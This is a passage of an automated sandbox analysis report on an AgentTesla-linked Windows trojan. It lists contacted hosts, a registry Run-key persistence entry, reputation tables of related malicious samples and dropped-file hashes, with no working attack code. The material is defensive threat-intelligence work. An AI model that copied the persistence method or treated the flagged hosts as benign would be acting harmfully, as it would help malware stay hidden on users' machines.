                                                                https://api.ipify.orgiNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cniNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fontbureau.com/designers/frere-user.htmliNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.jiyu-kobo.co.jp/iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPleaseiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fontbureau.com/designers8iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://localhost/arkanoid_server/requests.phpnewapp.exe, 0000000C.00000002.1923055304.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fonts.comiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sandoll.co.kriNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.urwpp.deDPleaseiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.zhongyicts.com.cniNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameiNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1837746080.0000000003695000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1923055304.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sakkal.comiNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          192.254.225.136
                                                                                          ercolina-usa.comUnited States
                                                                                          46606UNIFIEDLAYER-AS-1UStrue
                                                                                          104.26.12.205
                                                                                          api.ipify.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1588699
                                                                                          Start date and time:2025-01-11 04:20:07 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 28s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:18
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:iNFGd6bDZX.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@21/9@2/2
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 98%
                                                                                          • Number of executed functions: 253
                                                                                          • Number of non-executed functions: 27
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          TimeTypeDescription
                                                                                          03:21:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                          03:21:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                          22:20:58API Interceptor1620610x Sleep call for process: iNFGd6bDZX.exe modified
                                                                                          22:21:00API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                          22:21:11API Interceptor1168848x Sleep call for process: newapp.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          192.254.225.136B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    TECHNICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        RICHIESTA D'OFFERTA.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            PURCHASE SPCIFICIATIONS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                              • api.ipify.org/
                                                                                                              jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/?format=text
                                                                                                              xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                              • api.ipify.org/
                                                                                                              GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                                                                                              • api.ipify.org/
                                                                                                              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                                                                                              • api.ipify.org/
                                                                                                              Simple2.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                                              • api.ipify.org/
                                                                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                              • api.ipify.org/
                                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                              • api.ipify.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              api.ipify.orgMyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.26.12.205
                                                                                                              s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              CLOUDFLARENETUSn2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 104.18.73.116
                                                                                                              tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 172.67.167.146
                                                                                                              5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 172.67.74.152
                                                                                                              MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.205.31
                                                                                                              https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                              • 172.64.41.3
                                                                                                              fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              UNIFIEDLAYER-AS-1USRHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 162.241.62.63
                                                                                                              ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 192.254.186.165
                                                                                                              28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 162.241.62.63
                                                                                                              https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 162.241.149.91
                                                                                                              https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 162.241.149.91
                                                                                                              Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 108.179.241.236
                                                                                                              e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 162.241.62.63
                                                                                                              https://probashkontho.com/work/Organization/privacy/index_.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 192.185.57.31
                                                                                                              Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 192.254.186.165
                                                                                                              secured File__esperion.com.htmlGet hashmaliciousPhisherBrowse
                                                                                                              • 162.241.149.91
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eMyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.12.205
                                                                                                              AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.12.205
                                                                                                              AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.12.205
                                                                                                              4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.26.12.205
                                                                                                              n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.26.12.205
                                                                                                              njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.26.12.205
                                                                                                              KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.12.205
                                                                                                              YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.26.12.205
                                                                                                              KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.12.205
                                                                                                              No context
                                                                                                              Process:C:\Users\user\Desktop\iNFGd6bDZX.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:true
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                              Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2232
                                                                                                              Entropy (8bit):5.379736180876081
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:tLHyIFKL3IZ2KRH9Oug4Xs
                                                                                                              MD5:5761D171AE60BBDB848243C153814C7F
                                                                                                              SHA1:A81742F8C18F1C15061E3E19E1FF5223AF21E65D
                                                                                                              SHA-256:09B1E175BF93ED897EC6F347AD7AE4D30B1D8EC6C4A3585620D1F4A8DCA126DA
                                                                                                              SHA-512:2D6021A2430E6DA8021794EF8CB471D7D9DCFAD31F35F644C82BEA7EBF534D57EF6BC47A8725CD67FC593E6FF4E18094D7BF9F4FCCB07665E60121646F61ACFA
                                                                                                              Malicious:false
                                                                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
